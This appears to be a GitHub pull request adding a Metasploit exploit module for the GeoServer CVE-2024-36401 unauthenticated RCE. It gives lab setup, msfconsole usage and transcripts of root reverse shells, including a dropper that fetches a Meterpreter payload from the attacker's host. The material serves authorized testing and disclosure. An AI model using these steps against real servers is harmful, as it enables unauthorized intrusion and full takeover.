Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

GeoServer unauthenticated RCE [CVE-2024-36401] #19311

Merged
merged 10 commits into from
Jul 12, 2024

Conversation

h00die-gr3y
Copy link
Contributor

@h00die-gr3y h00die-gr3y commented Jul 8, 2024

GeoServer is an open-source software server written in Java that provides the ability to view, edit, and share geospatial data. It is designed to be a flexible, efficient solution for distributing geospatial data from a variety of sources such as Geographic Information System (GIS) databases, web-based data, and personal datasets.

In the GeoServer versions prior to 2.23.6, between version 2.24.0 and 2.24.3 and in version 2.25.0, 2.25.1, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.
An attacker can abuse this by sending a POST request with a malicious xpath expression to execute arbitrary commands as root on the system.

The following GeoServer releases are tested:

Osgeo.org Docker releases with Tomcat

  • docker.osgeo.org/geoserver 2.25.0
  • docker.osgeo.org/geoserver 2.24.2
  • docker.osgeo.org/geoserver 2.23.2
  • docker.osgeo.org/geoserver 2.23.0
  • docker.osgeo.org/geoserver 2.21.1

Vulhub Docker releases with Jetty

  • vulhub/geoserver 2.23.2
  • vulhub/geoserver 2.22.1

Linux binary installs with Jetty

  • geoserver 2.23.5 on x64 Ubuntu 22.04
  • geoserver 2.23.5 on Raspberry PI-4 ARM64 Kali Linux 2024.4

Installation steps to install the GeoServer web application

  • Follow these installation steps for platform-independent Linux binary.
  • Follow these installation steps for osgeo.org/geoserver docker images.
  • Use the docker-compose.yaml config file below to pull the vulhub geoserver docker images
version: '3'
services:
 web:
   image: vulhub/geoserver:2.23.2
   ports:
    - "8080:8080"
    - "5005:5005"
  • Pull and install the docker image with docker compose up -d
  • You should now be able to access the GeoServer web application via http://your_ip:8080/geoserver.

You are ready to test the module.

Verification Steps

  • Start msfconsole
  • use exploit/multi/http/geoserver_unauth_rce_cve_2024_36401
  • set rhosts <ip-target>
  • set rport <port>
  • set lhost <attacker-ip>
  • set target <0=Unix Command, 1=Linux Dropper>
  • exploit
  • you should get a reverse shell or Meterpreter session depending on the payload and target settings
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > info

       Name: Geoserver unauthenticated Remote Code Execution
     Module: exploit/multi/http/geoserver_unauth_rce_cve_2024_36401
   Platform: Unix, Linux
       Arch: cmd, x86, x64, aarch64, armle
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2024-07-01

Provided by:
  h00die-gr3y <h00die.gr3y@gmail.com>
  Steve Ikeoka

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
      Id  Name
      --  ----
  =>  0   Unix Command
      1   Linux Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basi
                                        cs/using-metasploit.html
  RPORT      8080             yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       The URI path of the OpenMediaVault web application
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host


  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the
                                       local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT  8080             yes       The local port to listen on.

Payload information:

Description:
  GeoServer is an open-source software server written in Java that provides
  the ability to view, edit, and share geospatial data.
  It is designed to be a flexible, efficient solution for distributing geospatial data
  from a variety of sources such as Geographic Information System (GIS) databases,
  web-based data, and personal datasets.
  In the GeoServer versions < 2.23.6, >= 2.24.0, < 2.24.4 and >= 2.25.0, < 2.25.1,
  multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users
  through specially crafted input against a default GeoServer installation due to unsafely
  evaluating property names as XPath expressions.
  An attacker can abuse this by sending a POST request with a malicious xpath expression
  to execute arbitrary commands as root on the system.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2024-36401
  https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv
  https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401
  https://attackerkb.com/topics/W6IDY2mmp9/cve-2024-36401


View the full module info with the info -d command.

Scenarios

GeoServer 2.23.5 on x64 Ubuntu 22.04 - cmd/unix/reverse_bash

msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401)  > set rhosts 192.168.201.86
rhosts => 192.168.201.86
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401)  > set lhost 192.168.201.8
lhost => 192.168.201.8
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of GeoServer.
[+] The target is vulnerable. Version 2.23.5
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Command shell session 7 opened (192.168.201.8:4444 -> 192.168.201.86:54072) at 2024-07-11 16:09:30 +0000

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux cuckoo 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
pwd
/usr/share/geoserver
exit

GeoServer 2.23.5 on ARM64 Raspberry PI-4 Kali Linux 2024.4 - cmd/unix/reverse_bash

msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set target 0
target => 0
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set rhosts 192.168.201.10
rhosts => 192.168.201.10
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set lhost 192.168.201.8
lhost => 192.168.201.8
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of GeoServer.
[+] The target is vulnerable. Version 2.23.5
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Command shell session 8 opened (192.168.201.8:4444 -> 192.168.201.10:50292) at 2024-07-11 16:15:31 +0000

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux cerberus 5.15.44-Re4son-v8l+ #1 SMP PREEMPT Debian kali-pi (2022-07-11) aarch64 GNU/Linux
pwd
/usr/share/geoserver
exit

GeoServer 2.23.2 on vulhub docker image - cmd/unix/reverse_bash

msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set target 0
target => 0
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set rhosts 192.168.201.42
rhosts => 192.168.201.10
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set lhost 192.168.201.8
lhost => 192.168.201.8
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of GeoServer.
[+] The target is vulnerable. Version 2.23.2
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Command shell session 9 opened (192.168.201.8:4444 -> 192.168.201.42:60290) at 2024-07-11 18:42:08 +0000

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux e3f986905bde 6.6.32-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Jun 13 14:14:43 UTC 2024 x86_64 GNU/Linux
pwd
/mnt/geoserver

GeoServer 2.23.2 on vulhub docker image - linux/x64/meterpreter_reverse_tcp

msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set target 1
target => 1
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set payload linux/x64/meterpreter_reverse_tcp
payload => linux/x64/meterpreter_reverse_tcp
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set srvport 1981
srvport => 1981
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of GeoServer.
[+] The target is vulnerable. Version 2.23.2
[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_tcp
[*] Using URL: http://192.168.201.8:1981/FEflDEJ
[*] Client 192.168.201.42 (curl/7.74.0) requested /FEflDEJ
[*] Sending payload to 192.168.201.42 (curl/7.74.0)
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Meterpreter session 10 opened (192.168.201.8:4444 -> 192.168.201.42:60353) at 2024-07-11 18:48:02 +0000
[*] Server stopped.

meterpreter > sysinfo
Computer     : 172.21.0.2
OS           : Debian 11.3 (Linux 6.6.32-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > pwd
/mnt/geoserver
meterpreter >

GeoServer 2.25.0 on osgeo.org/geoserver docker image - linux/x64/meterpreter_reverse_tcp

msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set target 1
target => 1
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set payload linux/x64/meterpreter_reverse_tcp
payload => linux/x64/meterpreter_reverse_tcp
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of GeoServer.
[+] The target is vulnerable. Version 2.25.0
[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_tcp
[*] Using URL: http://192.168.201.8:1981/CEkJIBo
[*] Client 192.168.201.42 (curl/7.81.0) requested /CEkJIBo
[*] Sending payload to 192.168.201.42 (curl/7.81.0)
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Meterpreter session 11 opened (192.168.201.8:4444 -> 192.168.201.42:61350) at 2024-07-11 20:46:14 +0000
[*] Server stopped.

meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Ubuntu 22.04 (Linux 6.6.32-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > pwd
/opt
meterpreter >

GeoServer 2.23.5 on ARM64 Raspberry PI-4 Kali Linux 2024.4 - linux/aarch64/meterpreter_reverse_tcp

msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set target 1
target => 1
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set payload linux/aarch64/meterpreter_reverse_tcp
payload => linux/aarch64/meterpreter_reverse_tcp
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set rhosts 192.168.201.10
rhosts => 192.168.201.10
msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of GeoServer.
[+] The target is vulnerable. Version 2.23.5
[*] Executing Linux Dropper for linux/aarch64/meterpreter_reverse_tcp
[*] Using URL: http://192.168.201.8:1981/680jWmUv1qm
[*] Client 192.168.201.10 (curl/8.5.0) requested /680jWmUv1qm
[*] Sending payload to 192.168.201.10 (curl/8.5.0)
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Meterpreter session 12 opened (192.168.201.8:4444 -> 192.168.201.10:60692) at 2024-07-11 21:04:34 +0000
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.201.10
OS           : Debian  (Linux 5.15.44-Re4son-v8l+)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > getuid
Server username: root
meterpreter > pwd
/usr/share/geoserver
meterpreter >

Limitations

No limitations.

@h00die-gr3y h00die-gr3y marked this pull request as draft July 8, 2024 06:58
@h00die-gr3y h00die-gr3y marked this pull request as ready for review July 10, 2024 22:00
Copy link

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@jheysel-r7 jheysel-r7 self-assigned this Jul 11, 2024
@jheysel-r7
Copy link
Contributor

Hey @h00die-gr3y, thanks for another great module and for adding the docs. I hope you don't mind me adding Windows support in 5d210b5. I saw the Windows installer and figure I'd take a crack at exploiting it. Let me know what you think of the addition.

So far everything looks good. I'll take another look tomorrow. Testing was as expected on both operating systems I tested.

Testing

Docker vulhub/geoserver:2.23.2

msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of GeoServer.
[+] The target is vulnerable. Version 2.23.2
[*] Executing Unix Command for cmd/unix/reverse_bash
[*] Command shell session 1 opened (172.16.199.1:4444 -> 172.16.199.132:50888) at 2024-07-11 10:22:34 -0700

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux 0b1c264c3d26 6.5.0-41-generic #41~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Mon Jun  3 11:32:55 UTC 2 x86_64 GNU/Linux

Windows 10 GeoServer 2.25.0

msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of GeoServer.
[+] The target is vulnerable. Version 2.25.0
[*] Executing Windows Command for cmd/windows/http/x64/meterpreter/reverse_tcp
[*] Sending stage (201798 bytes) to 172.16.199.131
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.131:51235) at 2024-07-11 16:14:11 -0700

meterpreter > getuid
Server username: DESKTOP-N3ORU31\msfuser
meterpreter > sysinfo
Computer        : DESKTOP-N3ORU31
OS              : Windows 10 (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >

Side note

I tried getting a Windows command stager target working for parity's sake although staged and stageless Meterpreter payloads both ending up failing. The staged payload failed because not all of the payload ends up getting base64 encoded and it runs into a parsing error

  <ows:Exception exceptionCode="OperationParsingFailed">
    <ows:ExceptionText>Request parsing failed
The entity name must immediately follow the &amp;apos;&amp;amp;&amp;apos; in the entity reference.</ows:ExceptionText>

And I think the stageless meterpreter payload is just too large:

  <ows:Exception exceptionCode="OperationProcessingFailed" locator="GetPropertyValue">
    <ows:ExceptionText>No such attribute: exec(java.lang.Runtime.getRuntime(), &amp;quot;echo <16000 bytes truncated> 

@h00die-gr3y
Copy link
Contributor Author

h00die-gr3y commented Jul 12, 2024

@jheysel-r7 Thanks for the windows addition.
I tried myself but could not make it work ;-)

Quickly checked it on my Windows Server 2022 Standard installation.
Works as a charm!

msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Trying to detect if target is running a vulnerable version of GeoServer.
[+] The target is vulnerable. Version 2.23.2
[*] Executing Windows Command for cmd/windows/http/x64/meterpreter/reverse_tcp
[*] Sending stage (201798 bytes) to 192.168.201.2
[*] Meterpreter session 1 opened (192.168.201.8:4444 -> 192.168.201.2:49825) at 2024-07-12 12:25:51 +0000

meterpreter > sysinfo
Computer        : VICTIM
OS              : Windows Server 2022 (10.0 Build 20348).
Architecture    : x64
System Language : en_US
Domain          : EVIL
Logged On Users : 6
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter >

Copy link
Contributor

@jheysel-r7 jheysel-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

@h00die-gr3y thanks for testing the Windows target so quickly. Teamwork makes the exploits work :)

I've added a couple more minor comments but other than those this looks like it's ready to be landed.

Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
@jheysel-r7 jheysel-r7 merged commit f7449ea into rapid7:master Jul 12, 2024
39 checks passed
@jheysel-r7
Copy link
Contributor

Release Notes

This adds an exploit module for CVE-2024-36401, an unauthenticated RCE vulnerability in GeoServer versions prior to 2.23.6, between version 2.24.0 and 2.24.3 and in version 2.25.0, 2.25.1.

@jheysel-r7 jheysel-r7 added the rn-modules release notes for new or majorly enhanced modules label Jul 12, 2024
@h00die-gr3y h00die-gr3y deleted the geoserver_unauth_rce branch July 12, 2024 22:56
@Chocapikk
Copy link
Contributor

Chocapikk commented Aug 2, 2024

Hey @jheysel-r7 , @h00die-gr3y , @cgranleese-r7 !

I noticed that the Metasploit module for CVE-2024-36401 might not work if the expected FeatureTypes are deleted or replaced with custom ones. My exploit handles this by allowing custom FeatureTypes to be used, ensuring it still works. You can check out my code here for inspiration: https://github.com/Chocapikk/CVE-2024-36401/blob/main/exploit.py#L117 .

In short, it just grab all the FeatureTypes without filtering as in the module.

Improving the module to dynamically detect and validate available FeatureTypes could make it more robust.

cc: @wvu

@h00die-gr3y
Copy link
Contributor Author

@Chocapikk ,
I reviewed your code. Indeed a good suggestion.
Let me open a PR to add your code at the module.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
Archived in project
Development

Successfully merging this pull request may close these issues.

4 participants